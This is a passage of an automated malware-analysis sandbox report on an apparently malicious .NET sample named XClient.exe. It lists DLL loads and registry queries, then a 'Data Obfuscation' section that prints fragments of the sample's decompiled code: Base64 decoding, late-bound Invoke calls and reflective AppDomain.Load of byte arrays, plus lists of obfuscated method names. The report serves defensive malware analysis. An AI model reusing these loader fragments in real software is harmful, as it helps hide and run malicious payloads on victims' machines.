              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

              Data Obfuscation

              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.Wr6q5bLs7DHxrEdofIk9tA9iWzb5ofuBZPEYZ,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.pM4QEnBnBVISDTk2dijym9ux34gbaBAr0vf9P,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.AHb26KVUTlUGlLGlEb92na5ZNirEU3BtyyUwm,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.yXLnX0iaasTS9FyCIAqHnRBhDmNTyGz9ZvNSS,cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.BDLdIEcYlEzgbiyZ4d1LeUOqQXRluUZtthkvo9eDTRiFVmOFbuVxx26ozhPe0LMrmbTGvMI6()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[2],cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm._6dx4BHW1HHZSHLW09YKmb2bJzE19SROvP6o68AvHletDQD4vzb1AYX1V7VD5X1rf1BV83xgg(Convert.FromBase64String(ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.Wr6q5bLs7DHxrEdofIk9tA9iWzb5ofuBZPEYZ,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.pM4QEnBnBVISDTk2dijym9ux34gbaBAr0vf9P,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.AHb26KVUTlUGlLGlEb92na5ZNirEU3BtyyUwm,WKLXtUFJUxWkLvpaCXwh7DlysyAipCMvV5eeS.yXLnX0iaasTS9FyCIAqHnRBhDmNTyGz9ZvNSS,cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.BDLdIEcYlEzgbiyZ4d1LeUOqQXRluUZtthkvo9eDTRiFVmOFbuVxx26ozhPe0LMrmbTGvMI6()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[2],cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm._6dx4BHW1HHZSHLW09YKmb2bJzE19SROvP6o68AvHletDQD4vzb1AYX1V7VD5X1rf1BV83xgg(Convert.FromBase64String(ZAeVAzy870sHQ1LF8XzIHJbNLv1p5YsTh40ig5ptzmalUvpWjhWDGNm[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu System.AppDomain.Load(byte[])
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb System.AppDomain.Load(byte[])
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu System.AppDomain.Load(byte[])
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs .Net Code: LAC1oLcwdALwfVqOOy1Riu9iJRtRZbMnqdz3QKzdhKx5iqtfh9Ljxzu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04E36338 pushad ; ret 1_2_04E36341
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04E36F1C pushad ; ret 1_2_04E36F23
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe Code function: 3_2_00007FFC3DD900BD pushad ; iretd 3_2_00007FFC3DD900C1
              Source: XClient.exe.0.dr, hTUHBEHQmRfs86X.cs High entropy of concatenated method names: 'eT7CSgtYMfkNrDd', 'hmhe5vdmI6aGya2', 'aZEdtMsjRprkBNk', 'x6MisZ12pbC3L49iCdlvqTxtzdmdcpzg', '_4oJtvFjmGun6hcRHlex8QCuIO95v2UZC', '_08u3aADlCmi2cn239yvoG019oNjYEVcA', 'nQCAbY2PPXsjZkKYjffvZqreCVNfWMph', '_4h5tXRdOiXMMhrWQaLAOpn7y8vQ3NEtc', '_4uMtgtYBPYJjShLm7mqCUiTIOceXpHJU', 'jF2IOqEIIJ9lJXdSJqcfPsksrhK4rLov'
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs High entropy of concatenated method names: 'rAiPVUEzwJO8T0PdfEy7xjKeKFqKwbpfOLXG7', 'RPlEPFY1IfL9dB2VcIO33KMQSdZZLUrewmoKI', 'bS29nu81ncjbmPDHED7GIWRqg6Nl5meA7YLFK', 'RpktvTY5MCiw1ZNA1rKXNhjFt3MB2jOxxe7YR', 'yn3jH0xs8s3RjX1Pk7hJ1k9NqbO3N8eZwL1il', '_5Uay6ZZQ96ResnI4fJSC0PRlla4V4O3NrlJfv', 'Vlq4VrmWhMUwHJFKadstMsMMwwAS4OPtiPGx9', 'Wx6p5cUGaRJKJB5m8SaDpbDoWqNiTQNvfSt4d', 'hFVEcc0RgyRsN6SatfmSpi1h46A2MSsV9f6s4', 'GZLn6m7D3kSoodNxWv4nQwmIf6Xu04Li4Q94D36TRjQu9BjRR8x7mUSMOfcWLHywxVnKg'
              Source: XClient.exe.0.dr, Pu2RYie7ItoFfHNwGY7nJEx0mZZWuK3Zyc8Cip1H57hq3TT0KC0ct7ahNbYgcfnHKTIUeOse5zM0aYl61EkDHkj.cs High entropy of concatenated method names: 'HjmXesd6pwDBG5pnSmFdZ6Hbgaf7WCZ2uvypLPM1YaI481J6S46W2XG58rBPBrLkjlz44F7JucUepT8pW6hGzUi', 'usQBCfSDiAGh9Ke9xb0u6MTWibvhvIz28raR0kO5b05sns2tDZL13Bcd61MlqFBZEXzeLko5PQtAYCKzEa0EH4Z', 'QjJYAUJx9SpkkXLtrM807qgovROyvUZAQ9GaAfdFcScQOMRIo2moneh032iOZyOWRLIbg7atyjJ5Vt2Cx52NNNB', 'hWL7LPFZnDmCnKs4jtdUhEXKS6vo0IEqP66cGLrRrZFjAC5YgRndvpvGVEP1NjAfl0hKwk1qYmsi5W0XzoPW3Qk', 'gBHGT5Gpc2I6Uw0Kybe58EJbRBgaW7nmjyfrYHnZGaRROdg', 'Bjz9IBfuyMoLq2M11DyUcqi92xjy5k1YWp7i2NgpLpuWZvw', 'q0Y6JaWCVEAETJUqbvvBrSkjjF15xvyZoZCRhwVkxU5dhmd', 'xcWbaTQrlI1HVz8Cnc4x5B74yl2TRgm5jGr2YgSn25YFIev', 'PdyMeTGCtzfGwNvJL6BFoBbmicw99jdhg1CgDThd0skee2k', 'LnXkbCLmudgPKEGJih65KT2yqZ2ruPIRr91HlLogDwSuSWC'
              Source: XClient.exe.0.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs High entropy of concatenated method names: 'N63qDT29evOtRxAgGebUumTfKZYIg3bs5LMkyUJ3XDsPlbhe7PjAtxnMZVjYzIPzsxDHR', 'z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb', 'bPdAiaQG7XZLrK1qZxI55S0mHyN7Jl5yHpaIoqTrLncZPpVx4pPGDVkeYB4hY6eD3lHzT', 'Wm5DGTxuGPLAc7hXlxdiXCYOGRhbGDiZGNtoQlGCeGMLgiCnRLOai9TGhbC6GxPDxkysU', 'pARUIDgQFtsdy7Bd5rMWSBg7pk3lgbQv9fHzewulxk9FX228t3dUc5gu0cS7zkYLguOkJ', 'vXtwdxl0ursQb97NsSt0qDTucOPQ3s21KcyuhY2EswRj6SaBYUXPRVpYgPSUOGrFGhx6H', 'OVLfpKCG9BnjSeiFZHpEiGc0orPyVStCe22chCWbdcveBuFWXs3D1nv0gTLT1Sti8KhrR', '_5LvvLySjBoGaHErFgiQmLpbmHdIm65GbpvP9v5AnEMoiOt2s3y3ReIzQuGUjb5smGaFf0', 'wkbUm3CjkkdjvuPo60KA1VF5cpGAbX8SOUFZqLUcaDGCpN6kJ7EP8Yw', 'Z8sDz7heEJ0sxvAVRqxVcsDyweAf5nMqbLjdOelOEv3sQMZeIqwwaH5'
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs High entropy of concatenated method names: '_6avM53x2QohqoJhS7wBZ1CSbYvNTmCFV0G9TcIFqd2S9FBChcgJHx0czopFJsgOm09xO5uU1', 'c8CqnjF9qWD61lP2ipzb4Sm181oM80V7KZTBQ0y6qXaDkfmyEdJCbPlOypIM1gmN8II7X9E6', 'plZt2yx37I3HDMObL1fbpCzWTjfgVw51V0MkEMUKuubg7of4K5NlyzBQuNlaCJkGXeNyz4bR', 'eFpB8V10PIjkdZqZpQQlFYyWgEREpQLOGwn3RFEQK0u1XNDB1tB09oYOdkxUHFZ95dPYSrGY', 'KsNXLC8P2LwRBn1WHJ8TCQcKVPXMRMRe36SBCTxxItyGIFEW4MlajC64JSU8MZhhl5MEjQ9I', 'ISZ5bT0HFFdRP1DN19zxcgHV2P4EOPdcNhEn9PuBxnVymF2Qa986dSWdzEBhTzkk056PyCHB', 'PW9bRjhBeokYl6yz9Kk2SslUdXTseVoD7Vxe4hvkkedAVdjOpYBfd1rzOa5x5JGJPJK7Umzj', 'D6jwhLRyRyuQE2kdHOLAaG3JAKB1zQ428yyY92OHHaPvBnwOagycvjdaHFWXIFHMBH1KHQ0C', 'vc5eaqbULMrxriBeLuoTVUFeHgpqjuyUIaXdozP3HbzaXNvFIc3Kv5QOvrcCBnDD8Q9yuZKC', 'fi9xL1d5NcWF1GQwmIQGbvvDjY6O2CymMOTTmKPfi70KI6CSXuezd1ZaOU1C2uvsxGZ2WdWA'
              Source: XClient.exe.0.dr, baAfO6eh57uwRmfnb9ZgPW9GNd4C97yj82jLx.cs High entropy of concatenated method names: 'FBNWljJUfRUOQHV8w5kXnivtFfvihr87V8fij', 'N3N7JwtMFIURW87Zd2HVZbIbG2Q4tHwh7ikej', 'B1UsqK3BpYtoo55elNJEb53GS0C4BTaQIZ5tg', 'C3gBLcFNJkCIB1aPhj8TVcFd5wa1qnkOytGkR', 'BAGercQozNU5ll1', 'pRsXO6M11LhQJ3Z', 'Nq9kdMsCokUEqhC', 'd1u9xj5WdnTP5q4', 'ZbkiMGaXA1UyJwz', 'Q6h2sNWLeb5UmQd'
              Source: XClient.exe.0.dr, g1kPeRidOFWh0Mq0MDiiGrVS0VQoWjR9LoOiyyxhvEYhDnS1Y9nkoDD.cs High entropy of concatenated method names: 'VnAbJoODtKisVBy9SiAIENlKxEhUXgX5exiB0QuqHxt3MeL1rBy2ZHl', 'hJNjb4ACG8m4LfFcFRQjlBemGYSGdLPOEu7AYsUVsI7TepYX5Tkm4Ni', 'frdyR57Y6gjgHH6VYoE4cGWT18oMjkhMpPM7cmtLYYrpt7wbAjPlIBQ', 'F5xEhnU7hl63oMlEZHMcn6Z4CMCSXdu1JkErNy5VoL1c5MmezBZcNTd', 'knQWD1iJeZD4eh2UfLwfytZY6rKYONhSvAjwI1VBf1TTI8xso3fziEu', 'rlVmKVaYfaOVfbWEp6E4ycLl1rYNf1bPNFqIkwFcXFmjurhdWDVS6im', 'Zg7qxS2XBZEHkisBbnADmlyURQPPxnIoCknLJAvG6qTarGhqaBU6FvS', '_7FjPXkphe9XxFusoxlK3MnQKjdzdH35wPynMUWyVOZpzWXnDcZJ6GPj', 'oaqFOrYjheWUMIioTDwW7rlNwzqvkjyLfRtEhry6VtTmB6xuu4DnUlH', 'mTgs5zCxmvC3ex4IJ6KG98hIFiEmIrZ0ORzsxAt6gxuObw7gQGiQSDX'
              Source: XClient.exe.0.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.cs High entropy of concatenated method names: 'fk5LEgK7V2M3Hd149MjNFpfBZMY7yDzfMnatgVqrXr4zOIYIMEuPC2meTY0zUtUnnhnWwc2PlydoWivaE2lUSNV', 'QdgYZBpeJQLNoNPSSSpUt0LD2lSaP3SuPdDmPNzFBNaIb5s', 'aPs5pNPwlUAmCT43hITfLsEFpH21qsblBeCsZhyHWyhyOzY', 'ZqNDMvGPRADzq7RjcJkjZlJ34C3ar2ptOVzBZgPJC7276VL', 'iFkpACBewAllh3bnBTSG0AtnPyVKhvaNVXyFYyIyFdqy923'
              Source: test.3.dr, hTUHBEHQmRfs86X.cs High entropy of concatenated method names: 'eT7CSgtYMfkNrDd', 'hmhe5vdmI6aGya2', 'aZEdtMsjRprkBNk', 'x6MisZ12pbC3L49iCdlvqTxtzdmdcpzg', '_4oJtvFjmGun6hcRHlex8QCuIO95v2UZC', '_08u3aADlCmi2cn239yvoG019oNjYEVcA', 'nQCAbY2PPXsjZkKYjffvZqreCVNfWMph', '_4h5tXRdOiXMMhrWQaLAOpn7y8vQ3NEtc', '_4uMtgtYBPYJjShLm7mqCUiTIOceXpHJU', 'jF2IOqEIIJ9lJXdSJqcfPsksrhK4rLov'
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs High entropy of concatenated method names: 'rAiPVUEzwJO8T0PdfEy7xjKeKFqKwbpfOLXG7', 'RPlEPFY1IfL9dB2VcIO33KMQSdZZLUrewmoKI', 'bS29nu81ncjbmPDHED7GIWRqg6Nl5meA7YLFK', 'RpktvTY5MCiw1ZNA1rKXNhjFt3MB2jOxxe7YR', 'yn3jH0xs8s3RjX1Pk7hJ1k9NqbO3N8eZwL1il', '_5Uay6ZZQ96ResnI4fJSC0PRlla4V4O3NrlJfv', 'Vlq4VrmWhMUwHJFKadstMsMMwwAS4OPtiPGx9', 'Wx6p5cUGaRJKJB5m8SaDpbDoWqNiTQNvfSt4d', 'hFVEcc0RgyRsN6SatfmSpi1h46A2MSsV9f6s4', 'GZLn6m7D3kSoodNxWv4nQwmIf6Xu04Li4Q94D36TRjQu9BjRR8x7mUSMOfcWLHywxVnKg'
              Source: test.3.dr, Pu2RYie7ItoFfHNwGY7nJEx0mZZWuK3Zyc8Cip1H57hq3TT0KC0ct7ahNbYgcfnHKTIUeOse5zM0aYl61EkDHkj.cs High entropy of concatenated method names: 'HjmXesd6pwDBG5pnSmFdZ6Hbgaf7WCZ2uvypLPM1YaI481J6S46W2XG58rBPBrLkjlz44F7JucUepT8pW6hGzUi', 'usQBCfSDiAGh9Ke9xb0u6MTWibvhvIz28raR0kO5b05sns2tDZL13Bcd61MlqFBZEXzeLko5PQtAYCKzEa0EH4Z', 'QjJYAUJx9SpkkXLtrM807qgovROyvUZAQ9GaAfdFcScQOMRIo2moneh032iOZyOWRLIbg7atyjJ5Vt2Cx52NNNB', 'hWL7LPFZnDmCnKs4jtdUhEXKS6vo0IEqP66cGLrRrZFjAC5YgRndvpvGVEP1NjAfl0hKwk1qYmsi5W0XzoPW3Qk', 'gBHGT5Gpc2I6Uw0Kybe58EJbRBgaW7nmjyfrYHnZGaRROdg', 'Bjz9IBfuyMoLq2M11DyUcqi92xjy5k1YWp7i2NgpLpuWZvw', 'q0Y6JaWCVEAETJUqbvvBrSkjjF15xvyZoZCRhwVkxU5dhmd', 'xcWbaTQrlI1HVz8Cnc4x5B74yl2TRgm5jGr2YgSn25YFIev', 'PdyMeTGCtzfGwNvJL6BFoBbmicw99jdhg1CgDThd0skee2k', 'LnXkbCLmudgPKEGJih65KT2yqZ2ruPIRr91HlLogDwSuSWC'
              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.cs High entropy of concatenated method names: 'N63qDT29evOtRxAgGebUumTfKZYIg3bs5LMkyUJ3XDsPlbhe7PjAtxnMZVjYzIPzsxDHR', 'z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb', 'bPdAiaQG7XZLrK1qZxI55S0mHyN7Jl5yHpaIoqTrLncZPpVx4pPGDVkeYB4hY6eD3lHzT', 'Wm5DGTxuGPLAc7hXlxdiXCYOGRhbGDiZGNtoQlGCeGMLgiCnRLOai9TGhbC6GxPDxkysU', 'pARUIDgQFtsdy7Bd5rMWSBg7pk3lgbQv9fHzewulxk9FX228t3dUc5gu0cS7zkYLguOkJ', 'vXtwdxl0ursQb97NsSt0qDTucOPQ3s21KcyuhY2EswRj6SaBYUXPRVpYgPSUOGrFGhx6H', 'OVLfpKCG9BnjSeiFZHpEiGc0orPyVStCe22chCWbdcveBuFWXs3D1nv0gTLT1Sti8KhrR', '_5LvvLySjBoGaHErFgiQmLpbmHdIm65GbpvP9v5AnEMoiOt2s3y3ReIzQuGUjb5smGaFf0', 'wkbUm3CjkkdjvuPo60KA1VF5cpGAbX8SOUFZqLUcaDGCpN6kJ7EP8Yw', 'Z8sDz7heEJ0sxvAVRqxVcsDyweAf5nMqbLjdOelOEv3sQMZeIqwwaH5'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs High entropy of concatenated method names: '_6avM53x2QohqoJhS7wBZ1CSbYvNTmCFV0G9TcIFqd2S9FBChcgJHx0czopFJsgOm09xO5uU1', 'c8CqnjF9qWD61lP2ipzb4Sm181oM80V7KZTBQ0y6qXaDkfmyEdJCbPlOypIM1gmN8II7X9E6', 'plZt2yx37I3HDMObL1fbpCzWTjfgVw51V0MkEMUKuubg7of4K5NlyzBQuNlaCJkGXeNyz4bR', 'eFpB8V10PIjkdZqZpQQlFYyWgEREpQLOGwn3RFEQK0u1XNDB1tB09oYOdkxUHFZ95dPYSrGY', 'KsNXLC8P2LwRBn1WHJ8TCQcKVPXMRMRe36SBCTxxItyGIFEW4MlajC64JSU8MZhhl5MEjQ9I', 'ISZ5bT0HFFdRP1DN19zxcgHV2P4EOPdcNhEn9PuBxnVymF2Qa986dSWdzEBhTzkk056PyCHB', 'PW9bRjhBeokYl6yz9Kk2SslUdXTseVoD7Vxe4hvkkedAVdjOpYBfd1rzOa5x5JGJPJK7Umzj', 'D6jwhLRyRyuQE2kdHOLAaG3JAKB1zQ428yyY92OHHaPvBnwOagycvjdaHFWXIFHMBH1KHQ0C', 'vc5eaqbULMrxriBeLuoTVUFeHgpqjuyUIaXdozP3HbzaXNvFIc3Kv5QOvrcCBnDD8Q9yuZKC', 'fi9xL1d5NcWF1GQwmIQGbvvDjY6O2CymMOTTmKPfi70KI6CSXuezd1ZaOU1C2uvsxGZ2WdWA'
              Source: test.3.dr, baAfO6eh57uwRmfnb9ZgPW9GNd4C97yj82jLx.cs High entropy of concatenated method names: 'FBNWljJUfRUOQHV8w5kXnivtFfvihr87V8fij', 'N3N7JwtMFIURW87Zd2HVZbIbG2Q4tHwh7ikej', 'B1UsqK3BpYtoo55elNJEb53GS0C4BTaQIZ5tg', 'C3gBLcFNJkCIB1aPhj8TVcFd5wa1qnkOytGkR', 'BAGercQozNU5ll1', 'pRsXO6M11LhQJ3Z', 'Nq9kdMsCokUEqhC', 'd1u9xj5WdnTP5q4', 'ZbkiMGaXA1UyJwz', 'Q6h2sNWLeb5UmQd'
              Source: test.3.dr, g1kPeRidOFWh0Mq0MDiiGrVS0VQoWjR9LoOiyyxhvEYhDnS1Y9nkoDD.cs High entropy of concatenated method names: 'VnAbJoODtKisVBy9SiAIENlKxEhUXgX5exiB0QuqHxt3MeL1rBy2ZHl', 'hJNjb4ACG8m4LfFcFRQjlBemGYSGdLPOEu7AYsUVsI7TepYX5Tkm4Ni', 'frdyR57Y6gjgHH6VYoE4cGWT18oMjkhMpPM7cmtLYYrpt7wbAjPlIBQ', 'F5xEhnU7hl63oMlEZHMcn6Z4CMCSXdu1JkErNy5VoL1c5MmezBZcNTd', 'knQWD1iJeZD4eh2UfLwfytZY6rKYONhSvAjwI1VBf1TTI8xso3fziEu', 'rlVmKVaYfaOVfbWEp6E4ycLl1rYNf1bPNFqIkwFcXFmjurhdWDVS6im', 'Zg7qxS2XBZEHkisBbnADmlyURQPPxnIoCknLJAvG6qTarGhqaBU6FvS', '_7FjPXkphe9XxFusoxlK3MnQKjdzdH35wPynMUWyVOZpzWXnDcZJ6GPj', 'oaqFOrYjheWUMIioTDwW7rlNwzqvkjyLfRtEhry6VtTmB6xuu4DnUlH', 'mTgs5zCxmvC3ex4IJ6KG98hIFiEmIrZ0ORzsxAt6gxuObw7gQGiQSDX'
